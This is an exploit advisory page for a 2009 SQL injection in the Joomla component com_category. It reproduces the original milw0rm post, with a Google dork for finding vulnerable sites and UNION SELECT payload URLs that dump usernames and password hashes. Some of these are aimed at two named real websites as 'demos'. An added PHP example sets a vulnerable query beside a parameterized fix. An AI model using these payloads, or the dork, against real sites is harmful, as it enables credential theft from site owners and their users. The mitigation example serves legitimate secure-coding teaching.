Vendor: Joomla
By: Prince_Pwn3r
CVSS: 7.5 (HIGH)
SQL Injection (CWE-89)
Product Name: Joomla
Affected Version From: 1.0.12
Affected Version To: 1.0.12
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla component ‘com_category’ SQL injection vulnerability

The Joomla component 'com_category' contains an SQL injection vulnerability that allows an attacker to inject arbitrary SQL commands by sending a specially crafted URL to the vulnerable application. The original advisory names 'edit' as the vulnerable parameter, while its proof-of-concept URLs place the injected SQL in 'catid' (or 'cat_id', depending on the site). The URL carries a UNION SELECT query which, when executed, dumps the contents of the database; the published examples read usernames and passwords from the jos_users table. Demos of the exploit given in the advisory:
http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
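
The mitigation above as an added example (not code from the advisory or from com_category itself): a concatenated category query beside a hardened one that accepts only an integer catid and binds it as a parameter. The table layout, sample rows, function names and the SQLite form of the payload are constructed for illustration, and the script assumes PHP 7.1+ with the pdo_sqlite extension.

```php
<?php
// Constructed in-memory schema and data; the component's real query is not on this page.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE jos_categories (id INTEGER, parent INTEGER, title TEXT, image TEXT, ordering INTEGER)");
$db->exec("CREATE TABLE jos_users (username TEXT, password TEXT)");
$db->exec("INSERT INTO jos_categories VALUES (12, 0, 'News', '', 1)");
$db->exec("INSERT INTO jos_users VALUES ('admin', 'constructed-hash')");

// Vulnerable pattern: the request value becomes part of the SQL text.
function loadCategoryUnsafe(PDO $db, string $catid): array {
    $sql = "SELECT id, parent, title, image, ordering FROM jos_categories WHERE id = " . $catid;
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened pattern: accept only a positive integer, then bind it as a parameter.
function loadCategorySafe(PDO $db, string $catid): ?array {
    $id = filter_var($catid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not an integer: the caller should answer 400/404, not run a query
    }
    $stmt = $db->prepare("SELECT id, parent, title, image, ordering FROM jos_categories WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// URL-decoded value in the shape of the advisory's catid payload; group_concat
// is rewritten for SQLite, which takes at most two arguments.
$payload = "-9999 UNION SELECT 1,2,group_concat(username || ':' || password),4,5 FROM jos_users--";

// Same input through both paths, then a legitimate id through the hardened path.
echo "unsafe, payload: ", json_encode(loadCategoryUnsafe($db, $payload)), "\n";
echo "safe, payload:   ", json_encode(loadCategorySafe($db, $payload)), "\n";
echo "safe, id 12:     ", json_encode(loadCategorySafe($db, '12')), "\n";
```

The integer check alone stops this payload; the bound parameter keeps the query safe even if the validation is later loosened or bypassed.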
Source

Exploit-DB raw data:

###############################################################
# Joomla component 'com_category' SQL injection vulnerability ###########
################################################################
#version: 1.0.12###################################################
################################################################
#dork:inurl:"com_category"##########################################
# ###############################################################
# xploited by Prince_Pwn3r##########################################
################################################################
# contact: 2p0wn0rN0t2p0wn@gmail.com##############################
################################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------

Vulnerable joomla component : com_category
vulnerable parameter: "edit" ($_GET)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploit :


http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

Demos :

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
or
http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--

*could be different (eg: view&color=3&cat_id=)

# milw0rm.com [2009-07-11]